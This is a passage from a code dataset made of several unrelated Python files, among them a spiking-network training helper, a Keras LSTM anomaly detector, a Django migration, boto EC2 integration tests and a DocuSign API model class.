spike count if ``count_log`` is enabled
"""
self.net.train()
if self.device is None:
for p in self.net.parameters():
self.device = p.device
break
device = self.device
input = input.to(device)
target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, net_loss, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, net_loss = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.training.num_samples += input.shape[0]
self.stats.training.loss_sum += loss.cpu().data.item() \
* output.shape[0]
if self.classifier is not None: # classification
self.stats.training.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if self.lam is not None: # add net_loss before backward step
loss += self.lam * net_loss
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if count is None:
return output
return output, count
def test(self, input, target):
"""Testing assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
spike count if ``count_log`` is enabled
"""
self.net.eval()
if self.device is None:
for p in self.net.parameters():
self.device = p.device
break
device = self.device
with torch.no_grad():
input = input.to(device)
target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, _, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, _ = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.testing.num_samples += input.shape[0]
self.stats.testing.loss_sum += loss.cpu().data.item() \
* output.shape[0]
if self.classifier is not None: # classification
self.stats.testing.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if count is None:
return output
return output, count
def valid(self, input, target):
"""Validation assistant.
Parameters
----------
input : torch tensor
input tensor.
target : torch tensor
ground truth or label.
Returns
-------
output
network's output.
count : optional
spike count if ``count_log`` is enabled
"""
        self.net.eval()
        if self.device is None:
            # nn.Module has no .device attribute; infer the device from the
            # parameters, exactly as train() and test() do.
            for p in self.net.parameters():
                self.device = p.device
                break
        device = self.device
        with torch.no_grad():
            input = input.to(device)
            target = target.to(device)
count = None
if self.count_log is True:
if self.lam is None:
output, count = self.net(input)
else:
output, _, count = self.net(input)
else:
if self.lam is None:
output = self.net(input)
else:
output, _ = self.net(input)
loss = self.error(output, target)
if self.stats is not None:
self.stats.validation.num_samples += input.shape[0]
                # both branches of the original if/else computed the same sum
                self.stats.validation.loss_sum += loss.cpu().data.item() \
                    * output.shape[0]
if self.classifier is not None: # classification
self.stats.validation.correct_samples += torch.sum(
self.classifier(output) == target
).cpu().data.item()
if count is None:
return output
return output, count
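# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module): wires the assistant
# to a toy network and random data. All names and shapes are illustrative.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    net = torch.nn.Sequential(torch.nn.Linear(4, 2))
    error = torch.nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(net.parameters(), lr=1e-3)
    assistant = Assistant(net, error, optimizer,
                          classifier=lambda out: out.argmax(dim=1))
    x = torch.randn(8, 4)
    y = torch.randint(0, 2, (8,))
    out = assistant.train(x, y)
    print('training output shape:', tuple(out.shape))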
| [((173, 13, 173, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((225, 13, 225, 28), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n')] |
cse-icon-dataAnalytics/lstm-anomaly-detect | lstm-synthetic-wave-anomaly-detect.py | bcfb01db383698acbd5692f1a76a5f20ec3629a8 | """ Inspired by example from
https://github.com/Vict0rSch/deep_learning/tree/master/keras/recurrent
Uses the TensorFlow backend
The basic idea is to detect anomalies in a time-series.
"""
import matplotlib.pyplot as plt
import numpy as np
import time
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from numpy import arange, sin, pi, random
np.random.seed(1234)
# Global hyper-parameters
sequence_length = 100
random_data_dup = 10  # each sample appears 0 to random_data_dup times (inclusive), so some samples may be dropped; see dropin
epochs = 1
batch_size = 50
def dropin(X, y):
""" The name suggests the inverse of dropout, i.e. adding more samples. See Data Augmentation section at
http://simaaron.github.io/Estimating-rainfall-from-weather-radar-readings-using-recurrent-neural-networks/
:param X: Each row is a training sequence
    :param y: The target we train on and will later predict
:return: new augmented X, y
"""
print("X shape:", X.shape)
print("y shape:", y.shape)
X_hat = []
y_hat = []
for i in range(0, len(X)):
        # np.random.random_integers was deprecated and later removed; randint
        # with an exclusive upper bound reproduces the same 0..random_data_dup draw.
        for j in range(0, np.random.randint(0, random_data_dup + 1)):
X_hat.append(X[i, :])
y_hat.append(y[i])
return np.asarray(X_hat), np.asarray(y_hat)
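# Quick sketch of what dropin() does (comments only; shapes are hypothetical):
#   X of shape (n, sequence_length - 1), y of shape (n,)
#   X_hat, y_hat = dropin(X, y)
#   each sample is kept between 0 and random_data_dup times (inclusive), so
#   some samples may vanish entirely while len(X_hat) can also exceed n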
def gen_wave():
""" Generate a synthetic wave by adding up a few sine waves and some noise
:return: the final wave
"""
t = np.arange(0.0, 10.0, 0.01)
wave1 = sin(2 * 2 * pi * t)
noise = random.normal(0, 0.1, len(t))
wave1 = wave1 + noise
print("wave1", len(wave1))
wave2 = sin(2 * pi * t)
print("wave2", len(wave2))
t_rider = arange(0.0, 0.5, 0.01)
wave3 = sin(10 * pi * t_rider)
print("wave3", len(wave3))
insert = round(0.8 * len(t))
wave1[insert:insert + 50] = wave1[insert:insert + 50] + wave3
return wave1 + wave2
def z_norm(result):
result_mean = result.mean()
result_std = result.std()
result -= result_mean
result /= result_std
return result, result_mean
def get_split_prep_data(train_start, train_end,
test_start, test_end):
data = gen_wave()
print("Length of Data", len(data))
# train data
print "Creating train data..."
result = []
for index in range(train_start, train_end - sequence_length):
result.append(data[index: index + sequence_length])
result = np.array(result) # shape (samples, sequence_length)
result, result_mean = z_norm(result)
print "Mean of train data : ", result_mean
print "Train data shape : ", result.shape
train = result[train_start:train_end, :]
np.random.shuffle(train) # shuffles in-place
X_train = train[:, :-1]
y_train = train[:, -1]
X_train, y_train = dropin(X_train, y_train)
# test data
print "Creating test data..."
result = []
for index in range(test_start, test_end - sequence_length):
result.append(data[index: index + sequence_length])
result = np.array(result) # shape (samples, sequence_length)
result, result_mean = z_norm(result)
print "Mean of test data : ", result_mean
print "Test data shape : ", result.shape
X_test = result[:, :-1]
y_test = result[:, -1]
print("Shape X_train", np.shape(X_train))
print("Shape X_test", np.shape(X_test))
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
return X_train, y_train, X_test, y_test
def build_model():
model = Sequential()
layers = {'input': 1, 'hidden1': 64, 'hidden2': 256, 'hidden3': 100, 'output': 1}
model.add(LSTM(
input_length=sequence_length - 1,
input_dim=layers['input'],
output_dim=layers['hidden1'],
return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(
layers['hidden2'],
return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(
layers['hidden3'],
return_sequences=False))
model.add(Dropout(0.2))
model.add(Dense(
output_dim=layers['output']))
model.add(Activation("linear"))
start = time.time()
model.compile(loss="mse", optimizer="rmsprop")
print "Compilation Time : ", time.time() - start
return model
def run_network(model=None, data=None):
global_start_time = time.time()
if data is None:
        print('Loading data... ')
# train on first 700 samples and test on next 300 samples (has anomaly)
X_train, y_train, X_test, y_test = get_split_prep_data(0, 700, 500, 1000)
else:
X_train, y_train, X_test, y_test = data
    print('\nData Loaded. Compiling...\n')
if model is None:
model = build_model()
try:
print("Training...")
model.fit(
X_train, y_train,
batch_size=batch_size, nb_epoch=epochs, validation_split=0.05)
print("Predicting...")
predicted = model.predict(X_test)
print("Reshaping predicted")
predicted = np.reshape(predicted, (predicted.size,))
except KeyboardInterrupt:
print("prediction exception")
        print('Training duration (s) : ', time.time() - global_start_time)
return model, y_test, 0
try:
plt.figure(1)
plt.subplot(311)
plt.title("Actual Test Signal w/Anomalies")
plt.plot(y_test[:len(y_test)], 'b')
plt.subplot(312)
plt.title("Predicted Signal")
plt.plot(predicted[:len(y_test)], 'g')
plt.subplot(313)
plt.title("Squared Error")
mse = ((y_test - predicted) ** 2)
plt.plot(mse, 'r')
plt.show()
except Exception as e:
print("plotting exception")
        print(str(e))
    print('Training duration (s) : ', time.time() - global_start_time)
return model, y_test, predicted
run_network()
| [] |
btenaglia/hpc-historias-clinicas | hpc-historias-clinicas/historias/migrations/0007_auto_20150425_1459.py | 649d8660381381b1c591667760c122d73071d5ec | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('historias', '0006_auto_20150413_0001'),
]
operations = [
migrations.AlterField(
model_name='historias',
name='fecha_ingreso',
field=models.DateField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468359), help_text='Formato: dd/mm/yyyy', verbose_name='Fecha de Ingreso'),
preserve_default=True,
),
migrations.AlterField(
model_name='historias',
name='hora_ingreso',
field=models.TimeField(default=datetime.datetime(2015, 4, 25, 14, 59, 14, 468307), help_text='Formato: hh:mm', verbose_name='Hora de Ingreso'),
preserve_default=True,
),
migrations.AlterField(
model_name='ubicaciones',
name='sala',
field=models.CharField(max_length=10, choices=[(b'SALA 1', b'SALA 1'), (b'SALA 2', b'SALA 2'), (b'SALA 3', b'SALA 3'), (b'SALA 4', b'SALA 4'), (b'SALA 5', b'SALA 5'), (b'GAURDIA', b'GAURDIA'), (b'NEO', b'NEO'), (b'UTI', b'UTI'), (b'UCO', b'UCO'), (b'PRE PARTO', b'PRE PARTO')]),
preserve_default=True,
),
]
| [((30, 18, 30, 289), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models, migrations\n'), ((18, 43, 18, 93), 'datetime.datetime', 'datetime.datetime', ({(18, 61, 18, 65): '(2015)', (18, 67, 18, 68): '(4)', (18, 70, 18, 72): '(25)', (18, 74, 18, 76): '(14)', (18, 78, 18, 80): '(59)', (18, 82, 18, 84): '(14)', (18, 86, 18, 92): '(468359)'}, {}), '(2015, 4, 25, 14, 59, 14, 468359)', False, 'import datetime\n'), ((24, 43, 24, 93), 'datetime.datetime', 'datetime.datetime', ({(24, 61, 24, 65): '(2015)', (24, 67, 24, 68): '(4)', (24, 70, 24, 72): '(25)', (24, 74, 24, 76): '(14)', (24, 78, 24, 80): '(59)', (24, 82, 24, 84): '(14)', (24, 86, 24, 92): '(468307)'}, {}), '(2015, 4, 25, 14, 59, 14, 468307)', False, 'import datetime\n')] |
Verckolf/MyInterfaceTest | venv/Lib/site-packages/har2case/__about__.py | e05674bd673a6a43cfb33f7cb4318886ba92a05c | __title__ = 'har2case'
__description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.'
__url__ = 'https://github.com/HttpRunner/har2case'
__version__ = '0.2.0'
__author__ = 'debugtalk'
__author_email__ = '[email protected]'
__license__ = 'Apache-2.0'
__copyright__ = 'Copyright 2017 debugtalk' | [] |
woctezuma/match-steam-banners | app_id_utils.py | dff1bc2ddf35a37bcdea46a220f5d0257d47e017 | import os
from pathlib import Path
from data_utils import get_data_path, get_image_data_path, get_image_extension
def app_id_to_image_filename(app_id, is_horizontal_banner=False):
image_data_path = get_image_data_path(is_horizontal_banner)
image_filename = image_data_path + str(app_id) + get_image_extension()
return image_filename
def image_filename_to_app_id(image_filename):
base_name = os.path.basename(image_filename)
    # str.strip() removes a *set of characters*, not a suffix; splitext is
    # the robust way to drop the extension here.
    app_id = os.path.splitext(base_name)[0]
return app_id
def list_app_ids(is_horizontal_banner=False):
image_data_path = get_image_data_path(is_horizontal_banner)
image_filenames = Path(image_data_path).glob("*" + get_image_extension())
app_ids = [image_filename_to_app_id(filename) for filename in image_filenames]
app_ids = sorted(app_ids, key=int)
return app_ids
def get_frozen_app_ids_filename():
frozen_app_ids_filename = get_data_path() + "frozen_app_ids.txt"
return frozen_app_ids_filename
def freeze_app_ids(app_ids, output_file_name=None):
if output_file_name is None:
output_file_name = get_frozen_app_ids_filename()
with open(output_file_name, "w", encoding="utf8") as f:
for app_id in app_ids:
f.write("{}\n".format(app_id))
return
def load_frozen_app_ids(input_file_name=None):
if input_file_name is None:
input_file_name = get_frozen_app_ids_filename()
with open(input_file_name, "r", encoding="utf8") as f:
# Do not convert to a set object, or any other conversion, because we want to keep the list order as it is.
# Just read the list from the file. That is all there is to do. Otherwise, appIDs will be scrambled!
frozen_app_ids = [app_id.strip() for app_id in f.readlines()]
return frozen_app_ids
def get_frozen_app_ids(is_horizontal_banner=False):
try:
frozen_app_ids = load_frozen_app_ids()
except FileNotFoundError:
print("Creating {}".format(get_frozen_app_ids_filename()))
frozen_app_ids = list_app_ids(is_horizontal_banner=is_horizontal_banner)
freeze_app_ids(frozen_app_ids)
return frozen_app_ids
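# Minimal usage sketch (not part of the original module); it assumes the
# banner images were already downloaded to the folder expected by data_utils.
if __name__ == "__main__":
    app_ids = get_frozen_app_ids()
    print("Found {} appIDs".format(len(app_ids)))
    if app_ids:
        print("First banner: {}".format(app_id_to_image_filename(app_ids[0])))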
| [((8, 22, 8, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(8, 42, 8, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((16, 16, 16, 48), 'os.path.basename', 'os.path.basename', ({(16, 33, 16, 47): 'image_filename'}, {}), '(image_filename)', False, 'import os\n'), ((24, 22, 24, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(24, 42, 24, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((10, 53, 10, 74), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((18, 29, 18, 50), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((36, 30, 36, 45), 'data_utils.get_data_path', 'get_data_path', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((26, 22, 26, 43), 'pathlib.Path', 'Path', ({(26, 27, 26, 42): 'image_data_path'}, {}), '(image_data_path)', False, 'from pathlib import Path\n'), ((26, 55, 26, 76), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n')] |
sjm446/aMAZEd | upload.py | 38789f9898097991b19e686fd76ef4abd5bfe94c | #!/usr/bin/env python
import boto3
import random
import os
BUCKET=os.environ.get('EXPORT_S3_BUCKET_URL')
if BUCKET is not None:
s3 = boto3.client('s3')
with open("maze.txt", "rb") as f:
s3.upload_fileobj(f, BUCKET, "maze"+str(random.randrange(100000))+".txt")
else:
print("EXPORT_S3_BUCKET_URL was not set so not uploading file")
| [((5, 7, 5, 45), 'os.environ.get', 'os.environ.get', ({(5, 22, 5, 44): '"""EXPORT_S3_BUCKET_URL"""'}, {}), "('EXPORT_S3_BUCKET_URL')", False, 'import os\n'), ((7, 9, 7, 27), 'boto3.client', 'boto3.client', ({(7, 22, 7, 26): '"""s3"""'}, {}), "('s3')", False, 'import boto3\n'), ((9, 48, 9, 72), 'random.randrange', 'random.randrange', ({(9, 65, 9, 71): '(100000)'}, {}), '(100000)', False, 'import random\n')] |
rtzll/zulip | zerver/management/commands/list_realms.py | b831df8f7fc2f5b89ec998266901ac491d52a7fc |
import sys
from typing import Any
from argparse import ArgumentParser
from zerver.models import Realm
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """List realms in the server and it's configuration settings(optional).
Usage examples:
./manage.py list_realms
./manage.py list_realms --all"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--all",
dest="all",
action="store_true",
default=False,
help="Print all the configuration settings of the realms.")
def handle(self, *args: Any, **options: Any) -> None:
realms = Realm.objects.all()
outer_format = "%-5s %-40s %-40s"
inner_format = "%-40s %s"
deactivated = False
if not options["all"]:
print(outer_format % ("id", "string_id", "name"))
print(outer_format % ("--", "---------", "----"))
for realm in realms:
if realm.deactivated:
print(self.style.ERROR(outer_format % (realm.id, realm.string_id, realm.name)))
deactivated = True
else:
print(outer_format % (realm.id, realm.string_id, realm.name))
if deactivated:
print(self.style.WARNING("\nRed rows represent deactivated realms."))
sys.exit(0)
# The remaining code path is the --all case.
identifier_attributes = ["id", "name", "string_id"]
for realm in realms:
# Start with just all the fields on the object, which is
# hacky but doesn't require any work to maintain.
realm_dict = realm.__dict__
# Remove a field that is confusingly useless
del realm_dict['_state']
# Fix the one bitfield to display useful data
realm_dict['authentication_methods'] = str(realm.authentication_methods_dict())
for key in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, realm_dict[key])))
deactivated = True
else:
print(inner_format % (key, realm_dict[key]))
            for key, value in sorted(realm_dict.items()):
if key not in identifier_attributes:
if realm.deactivated:
print(self.style.ERROR(inner_format % (key, value)))
else:
print(inner_format % (key, value))
print("-" * 80)
if deactivated:
print(self.style.WARNING("\nRed is used to highlight deactivated realms."))
| [((26, 17, 26, 36), 'zerver.models.Realm.objects.all', 'Realm.objects.all', ({}, {}), '()', False, 'from zerver.models import Realm\n'), ((44, 12, 44, 23), 'sys.exit', 'sys.exit', ({(44, 21, 44, 22): '(0)'}, {}), '(0)', False, 'import sys\n')] |
bopopescu/debpkg_python-boto | tests/integration/ec2/test_connection.py | 06f9b6f3693ba1933be8214da69cebcd5212cd97 | # Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2009, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the EC2Connection
"""
import unittest
import time
import telnetlib
import socket
from nose.plugins.attrib import attr
from boto.ec2.connection import EC2Connection
from boto.exception import EC2ResponseError
class EC2ConnectionTest(unittest.TestCase):
ec2 = True
@attr('notdefault')
def test_launch_permissions(self):
# this is my user_id, if you want to run these tests you should
# replace this with yours or they won't work
user_id = '963068290131'
        print('--- running EC2Connection tests ---')
c = EC2Connection()
# get list of private AMI's
rs = c.get_all_images(owners=[user_id])
assert len(rs) > 0
# now pick the first one
image = rs[0]
# temporarily make this image runnable by everyone
status = image.set_launch_permissions(group_names=['all'])
assert status
d = image.get_launch_permissions()
assert 'groups' in d
assert len(d['groups']) > 0
# now remove that permission
status = image.remove_launch_permissions(group_names=['all'])
assert status
time.sleep(10)
d = image.get_launch_permissions()
assert 'groups' not in d
def test_1_basic(self):
# create 2 new security groups
c = EC2Connection()
group1_name = 'test-%d' % int(time.time())
group_desc = 'This is a security group created during unit testing'
group1 = c.create_security_group(group1_name, group_desc)
time.sleep(2)
group2_name = 'test-%d' % int(time.time())
group_desc = 'This is a security group created during unit testing'
group2 = c.create_security_group(group2_name, group_desc)
# now get a listing of all security groups and look for our new one
rs = c.get_all_security_groups()
found = False
for g in rs:
if g.name == group1_name:
found = True
assert found
# now pass arg to filter results to only our new group
rs = c.get_all_security_groups([group1_name])
assert len(rs) == 1
# try some group to group authorizations/revocations
# first try the old style
status = c.authorize_security_group(group1.name,
group2.name,
group2.owner_id)
assert status
status = c.revoke_security_group(group1.name,
group2.name,
group2.owner_id)
assert status
# now try specifying a specific port
status = c.authorize_security_group(group1.name,
group2.name,
group2.owner_id,
'tcp', 22, 22)
assert status
status = c.revoke_security_group(group1.name,
group2.name,
group2.owner_id,
'tcp', 22, 22)
assert status
# now delete the second security group
status = c.delete_security_group(group2_name)
# now make sure it's really gone
rs = c.get_all_security_groups()
found = False
for g in rs:
if g.name == group2_name:
found = True
assert not found
group = group1
# now try to launch apache image with our new security group
rs = c.get_all_images()
img_loc = 'ec2-public-images/fedora-core4-apache.manifest.xml'
for image in rs:
if image.location == img_loc:
break
reservation = image.run(security_groups=[group.name])
instance = reservation.instances[0]
while instance.state != 'running':
            print('\tinstance is %s' % instance.state)
time.sleep(30)
instance.update()
# instance in now running, try to telnet to port 80
t = telnetlib.Telnet()
try:
t.open(instance.dns_name, 80)
except socket.error:
pass
# now open up port 80 and try again, it should work
group.authorize('tcp', 80, 80, '0.0.0.0/0')
t.open(instance.dns_name, 80)
t.close()
# now revoke authorization and try again
group.revoke('tcp', 80, 80, '0.0.0.0/0')
try:
t.open(instance.dns_name, 80)
except socket.error:
pass
# now kill the instance and delete the security group
instance.terminate()
# check that state and previous_state have updated
assert instance.state == 'shutting-down'
assert instance.state_code == 32
assert instance.previous_state == 'running'
assert instance.previous_state_code == 16
# unfortunately, I can't delete the sg within this script
#sg.delete()
# create a new key pair
key_name = 'test-%d' % int(time.time())
status = c.create_key_pair(key_name)
assert status
# now get a listing of all key pairs and look for our new one
rs = c.get_all_key_pairs()
found = False
for k in rs:
if k.name == key_name:
found = True
assert found
# now pass arg to filter results to only our new key pair
rs = c.get_all_key_pairs([key_name])
assert len(rs) == 1
key_pair = rs[0]
# now delete the key pair
status = c.delete_key_pair(key_name)
# now make sure it's really gone
rs = c.get_all_key_pairs()
found = False
for k in rs:
if k.name == key_name:
found = True
assert not found
# short test around Paid AMI capability
demo_paid_ami_id = 'ami-bd9d78d4'
demo_paid_ami_product_code = 'A79EC0DB'
l = c.get_all_images([demo_paid_ami_id])
assert len(l) == 1
assert len(l[0].product_codes) == 1
assert l[0].product_codes[0] == demo_paid_ami_product_code
        print('--- tests completed ---')
def test_dry_run(self):
c = EC2Connection()
dry_run_msg = 'Request would have succeeded, but DryRun flag is set.'
try:
rs = c.get_all_images(dry_run=True)
self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
self.assertTrue(dry_run_msg in str(e))
try:
rs = c.run_instances(
image_id='ami-a0cd60c9',
instance_type='m1.small',
dry_run=True
)
self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
self.assertTrue(dry_run_msg in str(e))
# Need an actual instance for the rest of this...
rs = c.run_instances(
image_id='ami-a0cd60c9',
instance_type='m1.small'
)
time.sleep(120)
try:
rs = c.stop_instances(
instance_ids=[rs.instances[0].id],
dry_run=True
)
self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
self.assertTrue(dry_run_msg in str(e))
try:
rs = c.terminate_instances(
instance_ids=[rs.instances[0].id],
dry_run=True
)
self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
self.assertTrue(dry_run_msg in str(e))
# And kill it.
rs.instances[0].terminate()
| [] |
joekohlsdorf/docusign-esign-python-client | docusign_esign/models/conditional_recipient_rule_filter.py | 40407544f79c88716d36fabf36f65c3ef1a5c3ba | # coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from docusign_esign.client.configuration import Configuration
class ConditionalRecipientRuleFilter(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'operator': 'str',
'recipient_id': 'str',
'scope': 'str',
'tab_id': 'str',
'tab_label': 'str',
'tab_type': 'str',
'value': 'str'
}
attribute_map = {
'operator': 'operator',
'recipient_id': 'recipientId',
'scope': 'scope',
'tab_id': 'tabId',
'tab_label': 'tabLabel',
'tab_type': 'tabType',
'value': 'value'
}
def __init__(self, _configuration=None, **kwargs): # noqa: E501
"""ConditionalRecipientRuleFilter - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._operator = None
self._recipient_id = None
self._scope = None
self._tab_id = None
self._tab_label = None
self._tab_type = None
self._value = None
self.discriminator = None
setattr(self, "_{}".format('operator'), kwargs.get('operator', None))
setattr(self, "_{}".format('recipient_id'), kwargs.get('recipient_id', None))
setattr(self, "_{}".format('scope'), kwargs.get('scope', None))
setattr(self, "_{}".format('tab_id'), kwargs.get('tab_id', None))
setattr(self, "_{}".format('tab_label'), kwargs.get('tab_label', None))
setattr(self, "_{}".format('tab_type'), kwargs.get('tab_type', None))
setattr(self, "_{}".format('value'), kwargs.get('value', None))
@property
def operator(self):
"""Gets the operator of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The operator of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._operator
@operator.setter
def operator(self, operator):
"""Sets the operator of this ConditionalRecipientRuleFilter.
# noqa: E501
:param operator: The operator of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._operator = operator
@property
def recipient_id(self):
"""Gets the recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501
:return: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._recipient_id
@recipient_id.setter
def recipient_id(self, recipient_id):
"""Sets the recipient_id of this ConditionalRecipientRuleFilter.
Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501
:param recipient_id: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._recipient_id = recipient_id
@property
def scope(self):
"""Gets the scope of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The scope of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._scope
@scope.setter
def scope(self, scope):
"""Sets the scope of this ConditionalRecipientRuleFilter.
# noqa: E501
:param scope: The scope of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._scope = scope
@property
def tab_id(self):
"""Gets the tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501
:return: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_id
@tab_id.setter
def tab_id(self, tab_id):
"""Sets the tab_id of this ConditionalRecipientRuleFilter.
The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501
:param tab_id: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_id = tab_id
@property
def tab_label(self):
"""Gets the tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
The label string associated with the tab. # noqa: E501
:return: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_label
@tab_label.setter
def tab_label(self, tab_label):
"""Sets the tab_label of this ConditionalRecipientRuleFilter.
The label string associated with the tab. # noqa: E501
:param tab_label: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_label = tab_label
@property
def tab_type(self):
"""Gets the tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
# noqa: E501
:return: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._tab_type
@tab_type.setter
def tab_type(self, tab_type):
"""Sets the tab_type of this ConditionalRecipientRuleFilter.
# noqa: E501
:param tab_type: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._tab_type = tab_type
@property
def value(self):
"""Gets the value of this ConditionalRecipientRuleFilter. # noqa: E501
Specifies the value of the tab. # noqa: E501
:return: The value of this ConditionalRecipientRuleFilter. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this ConditionalRecipientRuleFilter.
Specifies the value of the tab. # noqa: E501
:param value: The value of this ConditionalRecipientRuleFilter. # noqa: E501
:type: str
"""
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ConditionalRecipientRuleFilter, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ConditionalRecipientRuleFilter):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ConditionalRecipientRuleFilter):
return True
return self.to_dict() != other.to_dict()
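# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the generated file). Field values are
# illustrative only; see the DocuSign docs for the accepted values.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
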